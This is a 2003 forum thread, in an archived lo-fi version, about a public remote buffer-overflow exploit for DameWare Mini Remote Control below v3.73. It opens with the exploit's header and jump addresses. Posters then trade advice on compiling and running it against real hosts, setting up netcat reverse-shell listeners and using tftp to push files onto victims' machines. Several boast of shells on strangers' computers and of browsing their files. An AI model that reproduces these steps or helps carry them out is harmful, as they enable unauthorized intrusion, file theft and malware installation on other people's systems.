/ ******************************************************************************** ******/ /* [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt] */ /* - - - - - - - - - - - - - - - - - - - - - */ /* 8/10 win2k successfully exploited in blind mode (lang & type [pro,srv,etc] unknown) */ /* tested against dameware versions: v3.68 v3.72 */ /* In comments there's some information about offsets for jmp esp on diff OS. */ /* I've fixed a problem in the shellc0de, when I check for kernel32.dll, on winXP it */ /* is kernel32.dll, but on win2k it is KERNEL32.DLL (both in unicode format) */ /* shellc0de is a bit long for this b0f, so ExitThread won't be called, but it is in */ /* the shellcode.Some people reported me 2 different offsets for winXP pro, home, sp0 */ /* or sp1, so I don't know why it's different and I haven't XP at home I can't find */ /* another better EIP for XP (hope this 2 offsets will be enough). */ /* greetz: MrNice,AnAc,TripaX & Decryptus for helping me to find the EIP values. */ /*....................................................................................*/ /* informations: kralor[at]coromputer.net,www.coromputer.net,irc undernet #coromputer */ / ******************************************************************************** ******/
/* 0x717564B8 jmp esp in comctl32.dll win2k fr adv srv sp2 win2k en adv srv sp3 win2k en adv srv sp4 win2k en srv sp3 win2k fr pro sp3 win2k en pro sp4
#define RET "\xB8\x64\x75\x71" #define RET_XP "\x07\xD5\x36\x77" // or #define RET_XP "\xC1\x1C\x35\x77" // this offset has been reported by many people
DameWare Mini Remote Control ^^ on which port is this running?
thx
Lanig
Dec 20 2003, 02:37 PM
hmm to scan for this vuln i need to scan port 6129 (default for this service i think) or is there some better way?
Yosam
Dec 20 2003, 02:38 PM
hmm, compiled successfully but, what is <your_port> ? what should i put in there?
and how do i scan for this? which port should i scan and what banner (if needed) ?
thanks.
X-FloppY
Dec 20 2003, 02:40 PM
Yosam can you please post the compiled exploit? so we can help?
PuPPaFiSH
Dec 20 2003, 02:52 PM
Thank for the info, I'll try and compile it
Divx_dude
Dec 20 2003, 03:03 PM
QUOTE (Yosam @ Dec 20 2003, 02:38 PM)
hmm, compiled successfully but, what is <your_port> ? what should i put in there?
and how do i scan for this? which port should i scan and what banner (if needed) ?
thanks.
well u need to run a shell on your pc on port ( example ) 444
then u go to the exploit and ya give your ip in + the port whats your nc is running on your pc
sorry for bad english
X-FloppY
Dec 20 2003, 03:04 PM
i hate those that are compiling for theirselfs and not posting it's annoying like Yosam
KoNh
Dec 20 2003, 03:57 PM
QUOTE (X-FloppY @ Dec 20 2003, 03:04 PM)
i hate those that are compiling for theirselfs and not posting it's annoying like Yosam
just try to compile yerself, this way we can try to keep out some scripts kiddyz, unless yer one ?
X-FloppY
Dec 20 2003, 04:02 PM
Sorry m8 i don't know how to compile .... if ya like to teach me so pm me
Divx_dude
Dec 20 2003, 04:10 PM
dude ther emany progs for compiling
DEV c++ is a very good one try google and search
sorry for bad english
X-FloppY
Dec 20 2003, 04:38 PM
k dude thank's (: btw can you compile this exploit for now?
JdEeZy
Dec 20 2003, 07:17 PM
great exploit, got some shells.
Axl
Dec 20 2003, 08:49 PM
QUOTE (Lanig @ Dec 20 2003, 02:37 PM)
hmm to scan for this vuln i need to scan port 6129 (default for this service i think) or is there some better way?
I find scanning for 6129 to be most likely the best way. Problem is at least on the ranges i scan nobody has 6129 open
Lanig
Dec 20 2003, 09:04 PM
hmm i compiled this exploit but when i try it it just crashes my dameware mini remote control and not opening a shell but it might be my windows or something (winxp without sp1) http://wave.prohosting.com/eperry/DWMRC.exe
enjoy
ivan288
Dec 20 2003, 10:27 PM
i found out that it does crash some boxes but that eventually u get a shell. my friend even got one on win2000 and i think this is suppose to be for Xp only.
Axl
Dec 20 2003, 11:40 PM
no, it's not just for xp... i've gotten xp boxes and 2000 boxes with it only prob is they've got a/v and it kills you like 2 minutes after u get shell.
UnDeRTaKeR
Dec 20 2003, 11:52 PM
i need some help m8's... i started on my comp a shell like that:
QUOTE
nc.exe -L -p 22 -d -e CMD.exe
now i tried to exploit some box... and this what i got...
QUOTE
C:\Downloads\Exploits\Dameware Mini Remote Control Server Overflow Explo>DameWei rd xxx.x.xx.x xx.xx.xx.xx 22
[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt ] www.coromputer.net && undernet #coromputer
[+] Connecting to xxx.xx.x.xx ...Done [+] Gathering information ...Done [i] Operating system : Win2000 [i] Service Pack : 4 [+] Setting shellc0de for this version ...Done [+] Sending evil packet ...Done [i] Shell should be arrived at xx.xxx.xx.x:22
C:\Downloads\Exploits\Dameware Mini Remote Control Server Overflow Explo>
how do i get the shell?! how the shell should arive?!
please help me... BTW... i tried another version that worked perfect exept Win2000SP2&SP4...
i hate those that are compiling for theirselfs and not posting it's annoying like Yosam
just try to compile yerself, this way we can try to keep out some scripts kiddyz, unless yer one ?
hmm i'd compile myself but i get environment variable errors and what not.
UN|K
Dec 21 2003, 04:17 AM
i just want to know , how i can patch this hole
without re install another version
where can i find a patch ??
XtrA
Dec 21 2003, 07:13 AM
always its doing me this.. is it saying its not hackable?
CODE
dwmrc host_ip myip 333 [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt] www.coromputer.net && undernet #coromputer [08:58:26] <[SkyeR]> [+] Connecting to X.X.X.X ...Done [08:58:26] <[SkyeR]> error: wrong data received
one time its did me like that? its like connecting but then connection refused what may i do ? :\
CODE
dwmrc host myip 9630
[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt ] www.coromputer.net && undernet #coromputer
[+] Connecting to X.X.X.X ...error: connection refused
XtrA
Dec 21 2003, 07:47 AM
plz help me!! now i get in one :]]]] im in his computer uploaded files and typed net start serv-u but see:
CODE
net start serv-u The Serv-U FTP Server service is starting. Serv-U FTP Server service could not be started. A service specific error occurred: 100. More help is available by typing NET HELPMSG 3547.
what now? what can i do ? :\\\\\
Axl
Dec 21 2003, 08:32 AM
why don't you just name the service youarehacked ? Are you using firedaemon?
mastervampire
Dec 21 2003, 08:32 AM
im like XtrA
i got shell and im in this guys computer, browsing through his stuff, now how do i upload and execute a file on him?
Axl
Dec 21 2003, 08:35 AM
QUOTE (mastervampire @ Dec 21 2003, 08:32 AM)
im like XtrA
i got shell and im in this guys computer, browsing through his stuff, now how do i upload and execute a file on him?
start a tftp server and do tftp -i yourip get filename tftp32 works great
mastervampire
Dec 21 2003, 08:47 AM
do i have to download tftp server like it did have to download nc.exe ?
ma622
Dec 21 2003, 09:35 AM
could anyone build a proggy which checks the scan.txt for vuln ips and promts it to output.txt without dropping to shell?
XtrA
Dec 21 2003, 09:46 AM
QUOTE (QuantumTopology @ Dec 21 2003, 08:35 AM)
start a tftp server and do tftp -i yourip get filename tftp32 works great
hmm i try .. i opened tftp server and typed ur command in the victim`s computer but tftp dont do nothing and then TimeOut on the victim`s computer..
UnDeRTaKeR
Dec 21 2003, 10:07 AM
Hello anybody there?! Can some one please answer my questions?
shiz
Dec 21 2003, 11:05 AM
QUOTE
Yosam can you please post the compiled exploit? so we can help?
blah stop whining and try compiling some yourself, instead of actin like a scriptkid in here.. will get you banned...
knientje
Dec 21 2003, 11:10 AM
QUOTE (UnDeRTaKeR @ Dec 20 2003, 11:52 PM)
i need some help m8's... i started on my comp a shell like that:
QUOTE
nc.exe -L -p 22 -d -e CMD.exe
now i tried to exploit some box... and this what i got...
QUOTE
C:\Downloads\Exploits\Dameware Mini Remote Control Server Overflow Explo>DameWei rd xxx.x.xx.x xx.xx.xx.xx 22
[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt ] www.coromputer.net && undernet #coromputer
[+] Connecting to xxx.xx.x.xx ...Done [+] Gathering information ...Done [i] Operating system : Win2000 [i] Service Pack : 4 [+] Setting shellc0de for this version ...Done [+] Sending evil packet ...Done [i] Shell should be arrived at xx.xxx.xx.x:22
C:\Downloads\Exploits\Dameware Mini Remote Control Server Overflow Explo>
how do i get the shell?! how the shell should arive?!
please help me... BTW... i tried another version that worked perfect exept Win2000SP2&SP4...
i also like to know what to do then
knientje
Dec 21 2003, 11:12 AM
QUOTE (mastervampire @ Dec 21 2003, 08:32 AM)
im like XtrA
i got shell and im in this guys computer, browsing through his stuff, now how do i upload and execute a file on him?
how did ya connect to the shell?
Diablotic
Dec 21 2003, 11:13 AM
QUOTE (knientje @ Dec 21 2003, 11:10 AM)
QUOTE (UnDeRTaKeR @ Dec 20 2003, 11:52 PM)
i need some help m8's... i started on my comp a shell like that:
QUOTE
nc.exe -L -p 22 -d -e CMD.exe
now i tried to exploit some box... and this what i got...
QUOTE
C:\Downloads\Exploits\Dameware Mini Remote Control Server Overflow Explo>DameWei rd xxx.x.xx.x xx.xx.xx.xx 22
[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt ] www.coromputer.net && undernet #coromputer
[+] Connecting to xxx.xx.x.xx ...Done [+] Gathering information ...Done [i] Operating system : Win2000 [i] Service Pack : 4 [+] Setting shellc0de for this version ...Done [+] Sending evil packet ...Done [i] Shell should be arrived at xx.xxx.xx.x:22
C:\Downloads\Exploits\Dameware Mini Remote Control Server Overflow Explo>
how do i get the shell?! how the shell should arive?!
please help me... BTW... i tried another version that worked perfect exept Win2000SP2&SP4...
i also like to know what to do then
Did try to connect by Netcat on port 22?
knientje
Dec 21 2003, 11:25 AM
QUOTE (Diablotic @ Dec 21 2003, 11:13 AM)
QUOTE (knientje @ Dec 21 2003, 11:10 AM)
QUOTE (UnDeRTaKeR @ Dec 20 2003, 11:52 PM)
i need some help m8's... i started on my comp a shell like that:
QUOTE
nc.exe -L -p 22 -d -e CMD.exe
now i tried to exploit some box... and this what i got...
QUOTE
C:\Downloads\Exploits\Dameware Mini Remote Control Server Overflow Explo>DameWei rd xxx.x.xx.x xx.xx.xx.xx 22
[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt ] www.coromputer.net && undernet #coromputer
[+] Connecting to xxx.xx.x.xx ...Done [+] Gathering information ...Done [i] Operating system : Win2000 [i] Service Pack : 4 [+] Setting shellc0de for this version ...Done [+] Sending evil packet ...Done [i] Shell should be arrived at xx.xxx.xx.x:22
C:\Downloads\Exploits\Dameware Mini Remote Control Server Overflow Explo>
how do i get the shell?! how the shell should arive?!
please help me... BTW... i tried another version that worked perfect exept Win2000SP2&SP4...
i also like to know what to do then
Did try to connect by Netcat on port 22?
yeah, doesn't work
mastervampire
Dec 21 2003, 11:26 AM
QUOTE (XtrA @ Dec 21 2003, 09:46 AM)
QUOTE (QuantumTopology @ Dec 21 2003, 08:35 AM)
start a tftp server and do tftp -i yourip get filename tftp32 works great
hmm i try .. i opened tftp server and typed ur command in the victim`s computer but tftp dont do nothing and then TimeOut on the victim`s computer..
i get the same problem, timeout
dam it, i get lots of ips that i can get into but i cant upload a file to them :S allways timeout
UnDeRTaKeR
Dec 21 2003, 11:37 AM
im clueless
woodpecker_sjtu
Dec 21 2003, 01:20 PM
who succed? i cant get the shell
Divx_dude
Dec 21 2003, 01:28 PM
QUOTE (XtrA @ Dec 21 2003, 07:13 AM)
always its doing me this.. is it saying its not hackable?
CODE
dwmrc host_ip myip 333 [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt] www.coromputer.net && undernet #coromputer [08:58:26] <[SkyeR]> [+] Connecting to X.X.X.X ...Done [08:58:26] <[SkyeR]> error: wrong data received
one time its did me like that? its like connecting but then connection refused what may i do ? :\
CODE
dwmrc host myip 9630
[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt ] www.coromputer.net && undernet #coromputer
[+] Connecting to X.X.X.X ...error: connection refused
yo
CODE
dwmrc host myip 9630
[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt ] www.coromputer.net && undernet #coromputer
[+] Connecting to X.X.X.X ...error: connection refused
this means the ip isnt running dameware mini remote control simple as that
slex
Dec 21 2003, 01:29 PM
hi, I do C:\>nc -l -p 444 -e cmd.exe and next
C:\dame>dameweird **.***.***.** **.***.**.*** 444
[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt ] www.coromputer.net && undernet #coromputer
[+] Connecting to **.***.***.** ...Done [+] Gathering information ...Done [i] Operating system : Win2000 [i] Service Pack : 6 [+] Setting shellc0de for this version ...Done [+] Sending evil packet ...Done [i] Shell should be arrived at **.***.**.***:444
but no shell binded on the port 444... why ? :/
Axl
Dec 21 2003, 02:15 PM
QUOTE (mastervampire @ Dec 21 2003, 11:26 AM)
QUOTE (XtrA @ Dec 21 2003, 09:46 AM)
QUOTE (QuantumTopology @ Dec 21 2003, 08:35 AM)
start a tftp server and do tftp -i yourip get filename tftp32 works great
hmm i try .. i opened tftp server and typed ur command in the victim`s computer but tftp dont do nothing and then TimeOut on the victim`s computer..
i get the same problem, timeout
dam it, i get lots of ips that i can get into but i cant upload a file to them :S allways timeout
erm the tftp works great guys but when you transfer the big apps (as in 1 mb) the thing crashes... but u still get the whole thing transfered and u just have to reconnect. then just run your bats like normal *example: c:\windows\system32\inst.bat
matrix001
Dec 21 2003, 02:17 PM
you must nc -l -vv -p PORT
dmwrc.exe targetip yourip netcatport
e.g.
nc -l -vv -p 963
dmwrc.exe 12.12.12.12 66.66.66.66 963
If the exploit is sucessful a shell from the target (12.12.12.12) will conntect to your PC
Axl
Dec 21 2003, 02:22 PM
at last some wisdom !!!!
u idiot lamers !!!
u dont know whats a bind back shell ?!? OMG !!!
admin !!!! this forum is going down fasttttt......
nc.exe -l -p port -vvv
and then it will send a shell to your listening port !!!
UnDeRTaKeR
Dec 21 2003, 05:29 PM
Axl Chill down...
X-FloppY
Dec 21 2003, 06:23 PM
Chill m8 ppl is coming to learn btw it's nc -l -vv -p port
[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt ] www.coromputer.net && undernet #coromputer
[+] Connecting to xxx.xx.xxx.xxx ...Done [+] Gathering information ...Done [i] Operating system : Win2000 [i] Service Pack : 6 [+] Setting shellc0de for this version ...Done [+] Sending evil packet ...Done [i] Shell should be arrived at xx.xxx.xx.xxx:333
[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt ] www.coromputer.net && undernet #coromputer
[+] Connecting to xxx.xx.xxx.xxx ...Done [+] Gathering information ...Done [i] Operating system : Win2000 [i] Service Pack : 6 [+] Setting shellc0de for this version ...Done [+] Sending evil packet ...Done [i] Shell should be arrived at xx.xxx.xx.xxx:333
but no shell arrived, damn damn damn
Well maby the host is firewalled.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.